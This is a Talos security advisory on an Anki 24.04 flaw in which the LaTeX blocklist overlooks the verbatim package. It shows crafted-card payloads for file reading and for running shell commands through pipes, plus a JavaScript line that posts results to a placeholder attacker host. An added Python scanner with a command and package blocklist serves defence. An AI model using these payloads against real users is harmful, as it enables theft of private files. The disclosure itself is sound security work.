Talos Intelligence - TALOS-2024-1992
Published Jul 22, 2024 - 12:00 a.m.

Ankitects Anki Latex Incomplete Blocklist Vulnerability

2024-07-22 00:00:00
Talos Intelligence
www.talosintelligence.com
Tags: anki, latex, vulnerability, verbatim package, arbitrary file read, flashcard, vendor patch, cisco duo security

CVSS3: 6.5
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

AI Score: 6
Confidence: High
EPSS: 0.001
Percentile: 36.5%

Talos Vulnerability Report

TALOS-2024-1992

Ankitects Anki Latex Incomplete Blocklist Vulnerability

July 22, 2024
CVE Number

CVE-2024-29073

SUMMARY

A vulnerability in the handling of LaTeX exists in Ankitects Anki 24.04. When LaTeX is sanitized to prevent unsafe commands, the verbatim package, which is installed by default in many LaTeX distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Ankitects Anki 24.04

PRODUCT URLS

Anki - https://apps.ankiweb.net/

CVSSv3 SCORE

5.3 - CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

CWE

CWE-829 - Inclusion of Functionality from Untrusted Control Sphere

DETAILS

Anki is an open-source program that helps with memorization of information through the use of flash cards. It supports syncing of these cards across multiple computers as well as sharing cards with other users. It supports multiple different content types such as images, audio, videos, and scientific notation (via LaTeX).

Anki offers users the option to publicly share their decks, and using shared decks is normal behaviour; there are no warnings or checks in place to prevent using cards from someone else. A malicious user could share a deck to trigger the following vulnerability.

Anki uses LaTeX to render images or other TeX content in flashcards. This requires a LaTeX handler to be installed; for Windows, the Anki documentation suggests that users install MiKTeX. Some TeX commands allow operations that should not be permitted from a flashcard, such as reading or writing files.

Anki has a blocklist that prevents the use of commands that read files, but the commands provided by the verbatim package appear to have been overlooked (the package comes bundled with all LaTeX distributions).

An attacker using the following specially crafted card header section:

\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}

can load the verbatim package and then abuse its functionality. Using the \verbatiminput command inside the card body, an attacker can perform the following operations:

For arbitrary file read:

[latex]\verbatiminput{PATH_TO_FILE}[/latex]

For system information:

[latex]\verbatiminput{|texosquery-jre8 -o -r -a -l}[/latex]

Or for listing directories / files:

[latex]\verbatiminput{|kpsewhich ~/*}[/latex]
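The advisory's point is that a sanitizer which only blocks the well-known file-reading primitives misses an equivalent command that arrives through a package. The following is an added example (not Anki's code, and the blocklist contents are an assumption for illustration, since the advisory does not publish Anki's list) of a scanner that checks a note-type header plus each [latex]...[/latex] segment of a card for blocked packages, blocked control words, and pipe-style arguments of the form {|command}, using the header and payloads shown above as constructed sample input.

```python
import re

# Illustrative blocklist (an assumption for this example, not Anki's actual list):
# control words that read or write files, plus packages that expose such commands
# (verbatim's \verbatiminput is the one the advisory reports as overlooked).
BLOCKED_PACKAGES = frozenset({"verbatim", "catchfile", "listings"})
BLOCKED_COMMANDS = (
    r"\input", r"\include", r"\InputIfFileExists",
    r"\openin", r"\openout", r"\read", r"\write18",
    r"\verbatiminput", r"\lstinputlisting",
)

# Card-side LaTeX is delimited with [latex]...[/latex], as in the advisory's payloads.
LATEX_BLOCK_RE = re.compile(r"\[latex\](.*?)\[/latex\]", re.DOTALL)
USEPACKAGE_RE = re.compile(r"\\usepackage(?:\[[^\]]*\])?\{([^}]*)\}")
# A brace argument whose first non-space character is '|' asks TeX to read the
# output of a shell command rather than a file (the texosquery / kpsewhich forms).
PIPE_ARG_RE = re.compile(r"\{\s*\|[^}]*\}")

# Constructed sample input: the header from the advisory, plus three card bodies.
HEADER = r"""\documentclass[12pt]{article}
\special{papersize=3in,5in}
\usepackage[utf8]{inputenc}
\usepackage{amssymb,amsmath,verbatim}
\pagestyle{empty}
\setlength{\parindent}{0in}
\begin{document}"""
SAFE_HEADER = HEADER.replace("amssymb,amsmath,verbatim", "amssymb,amsmath")
BENIGN_CARD = r"What is [latex]$\sqrt{2}$[/latex] to three decimal places?"
FILE_READ_CARD = r"[latex]\verbatiminput{PATH_TO_FILE}[/latex]"
PIPE_CARD = r"[latex]\verbatiminput{|kpsewhich ~/*}[/latex]"


def latex_blocks(card_html):
    """Return the contents of every [latex]...[/latex] segment of a card."""
    return LATEX_BLOCK_RE.findall(card_html)


def usepackage_names(tex):
    """Return every package name requested by \\usepackage, including comma lists."""
    names = []
    for m in USEPACKAGE_RE.finditer(tex):
        names.extend(n.strip() for n in m.group(1).split(",") if n.strip())
    return names


def find_unsafe_latex(header, card_html):
    """Scan the header and each [latex] block of a card.

    Returns a list of (reason, snippet) tuples; an empty list means nothing was flagged.
    """
    findings = []
    for tex in [header] + latex_blocks(card_html):
        for name in usepackage_names(tex):
            if name in BLOCKED_PACKAGES:
                findings.append(("blocked package", name))
        for cmd in BLOCKED_COMMANDS:
            # Require a non-letter after the control word so that \input does not
            # match \inputfoo-style names and \include does not match \includegraphics.
            for m in re.finditer(re.escape(cmd) + r"(?![A-Za-z])", tex):
                findings.append(("blocked command", m.group(0)))
        for m in PIPE_ARG_RE.finditer(tex):
            findings.append(("pipe argument", m.group(0)))
    return findings


def is_card_safe(header, card_html):
    """True only when neither the header nor any card-side LaTeX was flagged."""
    return not find_unsafe_latex(header, card_html)


if __name__ == "__main__":
    for label, hdr, card in (("benign", SAFE_HEADER, BENIGN_CARD),
                             ("verbatim header", HEADER, BENIGN_CARD),
                             ("file read", SAFE_HEADER, FILE_READ_CARD),
                             ("pipe", SAFE_HEADER, PIPE_CARD)):
        print(label, "->", find_unsafe_latex(hdr, card))
```

Note that the header check matters on its own: the verbatim package is pulled in by the note type's header, so a card body that looks harmless is still rendered with \verbatiminput available. Matching the control word with a trailing non-letter lookahead is what keeps the benign \usepackage{inputenc} line from tripping the \input rule.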

The attacker can read the result of the rendered tags by exploiting the fact that the rendered content is placed in an HTML image element matching the selector "img.latex". With this knowledge, JavaScript code can be added to the card template:

// Read the path of the rendered LaTeX image from the card's DOM
const latex_image = document.querySelector("img.latex").getAttribute("src");
// Fetch it from Anki's local media server, base64-encode it, and post it to the attacker's host
fetchFileAndConvertToBase64(`http://${window.location.hostname}:${window.location.port}/${latex_image}`).then(base64Data => postBase64ToUrl(`http://${REPLACE_HOST_HERE}/upload`, base64Data));

which obtains the img.latex content and sends it to an attacker-controlled server.

TIMELINE

2024-05-27 - Vendor Disclosure
2024-06-24 - Vendor Patch Release
2024-07-22 - Public Release

Credit

Discovered by Autumn Bee Skerritt of Cisco Duo Security and Jacob B.

